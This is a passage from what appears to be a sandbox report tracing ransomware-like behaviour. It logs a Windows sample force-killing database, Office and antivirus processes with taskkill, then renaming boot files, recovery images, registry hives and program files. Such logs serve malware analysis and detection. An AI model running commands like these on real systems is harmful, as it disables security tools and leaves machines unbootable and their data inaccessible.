5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im msaccess.exe /F
4⤵
PID:2256

C:\Windows\system32\taskkill.exe
taskkill /im msaccess.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im msftesql.exe /F
4⤵
PID:272

C:\Windows\system32\taskkill.exe
taskkill /im msftesql.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im mydesktopqos.exe /F
4⤵
PID:996

C:\Windows\system32\taskkill.exe
taskkill /im mydesktopqos.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im mydesktopservice.exe /F
4⤵
PID:256

C:\Windows\system32\taskkill.exe
taskkill /im mydesktopservice.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im mysqld-nt.exe /F
4⤵
PID:3476

C:\Windows\system32\taskkill.exe
taskkill /im mysqld-nt.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im mysqld-opt.exe /F
4⤵
PID:2684

C:\Windows\system32\taskkill.exe
taskkill /im mysqld-opt.exe /F
5⤵
- Kills process with taskkill
PID:1180

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im mysqld.exe /F
4⤵
PID:3160

C:\Windows\system32\taskkill.exe
taskkill /im mysqld.exe /F
5⤵
- Kills process with taskkill
PID:488

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im ocautoupds.exe /F
4⤵
PID:3636

C:\Windows\system32\taskkill.exe
taskkill /im ocautoupds.exe /F
5⤵
- Kills process with taskkill
PID:712

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im ocssd.exe /F
4⤵
PID:2940

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im oracle.exe /F
4⤵
PID:264

C:\Windows\system32\taskkill.exe
taskkill /im oracle.exe /F
5⤵
- Kills process with taskkill
PID:244

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im sqlagent.exe /F
4⤵
PID:268

C:\Windows\system32\taskkill.exe
taskkill /im sqlagent.exe /F
5⤵
- Kills process with taskkill
PID:1328

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im sqlbrowser.exe /F
4⤵
PID:3356

C:\Windows\system32\taskkill.exe
taskkill /im sqlbrowser.exe /F
5⤵
- Kills process with taskkill
PID:836

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im sqlservr.exe /F
4⤵
PID:260

C:\Windows\system32\taskkill.exe
taskkill /im sqlservr.exe /F
5⤵
- Kills process with taskkill
PID:3380

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im synctime.exe /F
4⤵
PID:3940

C:\Windows\system32\taskkill.exe
taskkill /im synctime.exe /F
5⤵
- Kills process with taskkill
PID:744

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im thebat.exe /F
4⤵
PID:1520

C:\Windows\system32\taskkill.exe
taskkill /im thebat.exe /F
5⤵
- Kills process with taskkill
PID:3772

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im thebat64.exe /F
4⤵
PID:1880

C:\Windows\system32\taskkill.exe
taskkill /im thebat64.exe /F
5⤵
- Kills process with taskkill
PID:3040

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im encsvc.exe /F
4⤵
PID:1916

C:\Windows\system32\taskkill.exe
taskkill /im encsvc.exe /F
5⤵
- Kills process with taskkill
PID:1388

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im ocomm.exe /F
4⤵
PID:3588

C:\Windows\system32\taskkill.exe
taskkill /im ocomm.exe /F
5⤵
- Kills process with taskkill
PID:688

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im xfssvccon.exe /F
4⤵
PID:3580

C:\Windows\system32\taskkill.exe
taskkill /im xfssvccon.exe /F
5⤵
- Kills process with taskkill
PID:3848

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im excel.exe /F
4⤵
PID:2824

C:\Windows\system32\taskkill.exe
taskkill /im excel.exe /F
5⤵
- Kills process with taskkill
PID:3768

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im infopath.exe /F
4⤵
PID:1060

C:\Windows\system32\taskkill.exe
taskkill /im infopath.exe /F
5⤵
- Kills process with taskkill
PID:2304

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im mspub.exe /F
4⤵
PID:4004

C:\Windows\system32\taskkill.exe
taskkill /im mspub.exe /F
5⤵
- Kills process with taskkill
PID:2480

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im onenote.exe /F
4⤵
PID:2168

C:\Windows\system32\taskkill.exe
taskkill /im onenote.exe /F
5⤵
- Kills process with taskkill
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im outlook.exe /F
4⤵
PID:3576

C:\Windows\system32\taskkill.exe
taskkill /im outlook.exe /F
5⤵
- Kills process with taskkill
PID:1960

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im powerpnt.exe /F
4⤵
PID:2696

C:\Windows\system32\taskkill.exe
taskkill /im powerpnt.exe /F
5⤵
- Kills process with taskkill
PID:3736

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im visio.exe /F
4⤵
PID:1032

C:\Windows\system32\taskkill.exe
taskkill /im visio.exe /F
5⤵
- Kills process with taskkill
PID:1176

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im winword.exe /F
4⤵
PID:3340

C:\Windows\system32\taskkill.exe
taskkill /im winword.exe /F
5⤵
- Kills process with taskkill
PID:1036

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im wordpad.exe /F
4⤵
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /im wordpad.exe /F
5⤵
- Kills process with taskkill
PID:3708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /IM CNTAoSMgr.exe /F
4⤵
PID:3872

C:\Windows\system32\taskkill.exe
taskkill /IM CNTAoSMgr.exe /F
5⤵
- Kills process with taskkill
PID:2796

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /IM mbamtray.exe /F
4⤵
PID:1632

C:\Windows\system32\taskkill.exe
taskkill /IM mbamtray.exe /F
5⤵
- Kills process with taskkill
PID:3520

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /IM Ntrtsc
4⤵
PID:2244

C:\Windows\system32\taskkill.exe
taskkill /IM Ntrtsc
5⤵
- Kills process with taskkill
PID:1720

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /IM PccNTMon.exe /F
4⤵
PID:1516

C:\Windows\system32\taskkill.exe
taskkill /IM PccNTMon.exe /F
5⤵
- Kills process with taskkill
PID:1504

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /IM tmlisten.exe /F
4⤵
PID:1688

C:\Windows\system32\taskkill.exe
taskkill /IM tmlisten.exe /F
5⤵
- Kills process with taskkill
PID:1660

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\BOOTNXT""" """C:\\BOOTNXT.back_up"""
4⤵
PID:1716

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\bootmgr""" """C:\\bootmgr.back_up"""
4⤵
PID:2732

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\BCD""" """C:\\Boot\BCD.back_up"""
4⤵
PID:2088

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\BOOTSECT.BAK""" """C:\\BOOTSECT.BAK.back_up"""
4⤵
PID:1912

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini""" """C:\\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini.back_up"""
4⤵
PID:1180

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\BCD.LOG""" """C:\\Boot\BCD.LOG.back_up"""
4⤵
PID:1060

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\pagefile.sys""" """C:\\pagefile.sys.back_up"""
4⤵
PID:1544

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\odt\config.xml""" """C:\\odt\config.xml.back_up"""
4⤵
PID:1860

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\BCD.LOG2""" """C:\\Boot\BCD.LOG2.back_up"""
4⤵
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\BCD.LOG1""" """C:\\Boot\BCD.LOG1.back_up"""
4⤵
PID:2480

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\bg-BG\bootmgr.exe.mui""" """C:\\Boot\bg-BG\bootmgr.exe.mui.back_up"""
4⤵
PID:2528

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\swapfile.sys""" """C:\\swapfile.sys.back_up"""
4⤵
PID:1548

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\ClearConvertTo.temp""" """C:\\Program Files\ClearConvertTo.temp.back_up"""
4⤵
PID:1328

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\CheckpointMount.m4v""" """C:\\Program Files\CheckpointMount.m4v.back_up"""
4⤵
PID:252

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\ClearEnter.MTS""" """C:\\Program Files\ClearEnter.MTS.back_up"""
4⤵
PID:1692

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\7-zip.chm""" """C:\\Program Files\7-Zip\7-zip.chm.back_up"""
4⤵
PID:3380

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\desktop.ini""" """C:\\Program Files (x86)\desktop.ini.back_up"""
4⤵
PID:2164

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\BOOTSTAT.DAT""" """C:\\Boot\BOOTSTAT.DAT.back_up"""
4⤵
PID:3340

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\vcredist2010_x64.log-MSI_vc_red.msi.txt""" """C:\\vcredist2010_x64.log-MSI_vc_red.msi.txt.back_up"""
4⤵
PID:3040

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\CompareRegister.ini""" """C:\\Program Files\CompareRegister.ini.back_up"""
4⤵
PID:1320

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\da-DK\bootmgr.exe.mui""" """C:\\Boot\da-DK\bootmgr.exe.mui.back_up"""
4⤵
PID:964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\vcredist2010_x64.log.html""" """C:\\vcredist2010_x64.log.html.back_up"""
4⤵
PID:3064

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Recovery\WindowsRE\boot.sdi""" """C:\\Recovery\WindowsRE\boot.sdi.back_up"""
4⤵
PID:1660

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\cs-CZ\bootmgr.exe.mui""" """C:\\Boot\cs-CZ\bootmgr.exe.mui.back_up"""
4⤵
PID:2204

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\CompleteInvoke.mpeg2""" """C:\\Program Files\CompleteInvoke.mpeg2.back_up"""
4⤵
PID:4048

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\da-DK\memtest.exe.mui""" """C:\\Boot\da-DK\memtest.exe.mui.back_up"""
4⤵
PID:3476

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\cs-CZ\memtest.exe.mui""" """C:\\Boot\cs-CZ\memtest.exe.mui.back_up"""
4⤵
PID:2200

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\7z.sfx""" """C:\\Program Files\7-Zip\7z.sfx.back_up"""
4⤵
PID:3164

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\CompressRestart.zip""" """C:\\Program Files\CompressRestart.zip.back_up"""
4⤵
PID:260

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\7zCon.sfx""" """C:\\Program Files\7-Zip\7zCon.sfx.back_up"""
4⤵
PID:3108

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Common Files\DESIGNER\MSADDNDR.OLB""" """C:\\Program Files\Common Files\DESIGNER\MSADDNDR.OLB.back_up"""
4⤵
PID:2292

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\CompleteLimit.reg""" """C:\\Program Files\CompleteLimit.reg.back_up"""
4⤵
PID:3136

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\ConfirmDisconnect.mp2""" """C:\\Program Files\ConfirmDisconnect.mp2.back_up"""
4⤵
PID:744

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\desktop.ini""" """C:\\Users\desktop.ini.back_up"""
4⤵
PID:1692

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\vcredist2012_x64_0_vcRuntimeMinimum_x64.log""" """C:\\vcredist2012_x64_0_vcRuntimeMinimum_x64.log.back_up"""
4⤵
PID:2640

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm.back_up"""
4⤵
PID:2796

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\vcredist2012_x64_1_vcRuntimeAdditional_x64.log""" """C:\\vcredist2012_x64_1_vcRuntimeAdditional_x64.log.back_up"""
4⤵
PID:3340

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Contacts\desktop.ini""" """C:\\Users\Admin\Contacts\desktop.ini.back_up"""
4⤵
PID:2168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Recovery\WindowsRE\Winre.wim""" """C:\\Recovery\WindowsRE\Winre.wim.back_up"""
4⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Recovery\WindowsRE\ReAgent.xml""" """C:\\Recovery\WindowsRE\ReAgent.xml.back_up"""
4⤵
PID:3700

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\descript.ion""" """C:\\Program Files\7-Zip\descript.ion.back_up"""
4⤵
PID:2448

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\ConvertEnable.3gp""" """C:\\Program Files\ConvertEnable.3gp.back_up"""
4⤵
PID:4048

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\DebugWatch.m1v""" """C:\\Program Files\DebugWatch.m1v.back_up"""
4⤵
PID:2824

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\vcredist2013_x64_000_vcRuntimeMinimum_x64.log""" """C:\\vcredist2013_x64_000_vcRuntimeMinimum_x64.log.back_up"""
4⤵
PID:3944

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\ie9props.propdesc""" """C:\\Program Files (x86)\Internet Explorer\ie9props.propdesc.back_up"""
4⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\History.txt""" """C:\\Program Files\7-Zip\History.txt.back_up"""
4⤵
PID:3576

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf.back_up"""
4⤵
PID:3340

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\vcredist2013_x64_001_vcRuntimeAdditional_x64.log""" """C:\\vcredist2013_x64_001_vcRuntimeAdditional_x64.log.back_up"""
4⤵
PID:2696

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\CopyWrite.gif""" """C:\\Program Files\CopyWrite.gif.back_up"""
4⤵
PID:1304

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\DenyNew.inf""" """C:\\Program Files\DenyNew.inf.back_up"""
4⤵
PID:1724

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\vcredist2019_x64_000_vcRuntimeMinimum_x64.log""" """C:\\vcredist2019_x64_000_vcRuntimeMinimum_x64.log.back_up"""
4⤵
PID:2824

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\et-EE\bootmgr.exe.mui""" """C:\\Boot\et-EE\bootmgr.exe.mui.back_up"""
4⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\vcredist2019_x64_001_vcRuntimeAdditional_x64.log""" """C:\\vcredist2019_x64_001_vcRuntimeAdditional_x64.log.back_up"""
4⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\desktop.ini""" """C:\\Program Files\desktop.ini.back_up"""
4⤵
PID:3136

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.back_up"""
4⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\ExpandSend.otf""" """C:\\Program Files\ExpandSend.otf.back_up"""
4⤵
PID:3520

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\fr-FR\bootmgr.exe.mui""" """C:\\Boot\fr-FR\bootmgr.exe.mui.back_up"""
4⤵
PID:4016

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\License.txt""" """C:\\Program Files\7-Zip\License.txt.back_up"""
4⤵
PID:628

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\an.txt""" """C:\\Program Files\7-Zip\Lang\an.txt.back_up"""
4⤵
PID:3476

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\fr-FR\memtest.exe.mui""" """C:\\Boot\fr-FR\memtest.exe.mui.back_up"""
4⤵
PID:1020

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\en-US\hmmapi.dll.mui""" """C:\\Program Files (x86)\Internet Explorer\en-US\hmmapi.dll.mui.back_up"""
4⤵
PID:1032

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\en-US\ieinstal.exe.mui""" """C:\\Program Files (x86)\Internet Explorer\en-US\ieinstal.exe.mui.back_up"""
4⤵
PID:2224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Mozilla Maintenance Service\updater.ini""" """C:\\Program Files (x86)\Mozilla Maintenance Service\updater.ini.back_up"""
4⤵
PID:3064

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\es-ES\bootmgr.exe.mui""" """C:\\Boot\es-ES\bootmgr.exe.mui.back_up"""
4⤵
PID:4140

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\readme.txt""" """C:\\Program Files\7-Zip\readme.txt.back_up"""
4⤵
PID:4132

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\DismountWatch.xlt""" """C:\\Program Files\DismountWatch.xlt.back_up"""
4⤵
PID:4124

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\ast.txt""" """C:\\Program Files\7-Zip\Lang\ast.txt.back_up"""
4⤵
PID:4208

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\ar.txt""" """C:\\Program Files\7-Zip\Lang\ar.txt.back_up"""
4⤵
PID:4184

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\NTUSER.DAT""" """C:\\Users\Admin\NTUSER.DAT.back_up"""
4⤵
PID:4252

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\ntuser.dat.LOG1""" """C:\\Users\Admin\ntuser.dat.LOG1.back_up"""
4⤵
PID:4264

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\af.txt""" """C:\\Program Files\7-Zip\Lang\af.txt.back_up"""
4⤵
PID:4240

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\ko-KR\bootmgr.exe.mui""" """C:\\Boot\ko-KR\bootmgr.exe.mui.back_up"""
4⤵
PID:4320

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\az.txt""" """C:\\Program Files\7-Zip\Lang\az.txt.back_up"""
4⤵
PID:4348

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\ntuser.dat.LOG2""" """C:\\Users\Admin\ntuser.dat.LOG2.back_up"""
4⤵
PID:4364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui""" """C:\\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui.back_up"""
4⤵
PID:4336

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""" """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.back_up"""
4⤵
PID:4400

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\ko-KR\memtest.exe.mui""" """C:\\Boot\ko-KR\memtest.exe.mui.back_up"""
4⤵
PID:4392

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\es-ES\memtest.exe.mui""" """C:\\Boot\es-ES\memtest.exe.mui.back_up"""
4⤵
PID:4312

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\JoinUninstall.lock""" """C:\\Program Files\JoinUninstall.lock.back_up"""
4⤵
PID:4436

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\es-MX\bootmgr.exe.mui""" """C:\\Boot\es-MX\bootmgr.exe.mui.back_up"""
4⤵
PID:4456

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""" """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.back_up"""
4⤵
PID:4448

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\ba.txt""" """C:\\Program Files\7-Zip\Lang\ba.txt.back_up"""
4⤵
PID:4532

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\LimitRemove.png""" """C:\\Program Files\LimitRemove.png.back_up"""
4⤵
PID:4512

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\el-GR\bootmgr.exe.mui""" """C:\\Boot\el-GR\bootmgr.exe.mui.back_up"""
4⤵
PID:4632

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\ntuser.ini""" """C:\\Users\Admin\ntuser.ini.back_up"""
4⤵
PID:4676

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\de-DE\bootmgr.exe.mui""" """C:\\Boot\de-DE\bootmgr.exe.mui.back_up"""
4⤵
PID:4668

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""" """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.back_up"""
4⤵
PID:4596

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\be.txt""" """C:\\Program Files\7-Zip\Lang\be.txt.back_up"""
4⤵
PID:4588

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms""" """C:\\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.back_up"""
4⤵
PID:4576

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\LockPublish.fon""" """C:\\Program Files\LockPublish.fon.back_up"""
4⤵
PID:4560

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag""" """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.back_up"""
4⤵
PID:4760

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\el-GR\memtest.exe.mui""" """C:\\Boot\el-GR\memtest.exe.mui.back_up"""
4⤵
PID:4752

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\de-DE\memtest.exe.mui""" """C:\\Boot\de-DE\memtest.exe.mui.back_up"""
4⤵
PID:4796

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\bg.txt""" """C:\\Program Files\7-Zip\Lang\bg.txt.back_up"""
4⤵
PID:4744

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\bn.txt""" """C:\\Program Files\7-Zip\Lang\bn.txt.back_up"""
4⤵
PID:4736

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\br.txt""" """C:\\Program Files\7-Zip\Lang\br.txt.back_up"""
4⤵
PID:4884

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag""" """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.back_up"""
4⤵
PID:4876

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.back_up"""
4⤵
PID:4864

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag""" """C:\\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.back_up"""
4⤵
PID:4976

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp.back_up"""
4⤵
PID:4964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini.back_up"""
4⤵
PID:4948

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.back_up"""
4⤵
PID:4924

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\ca.txt""" """C:\\Program Files\7-Zip\Lang\ca.txt.back_up"""
4⤵
PID:4916

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\co.txt""" """C:\\Program Files\7-Zip\Lang\co.txt.back_up"""
4⤵
PID:5032

C:\Windows\SYSTEM32\cmd.exe
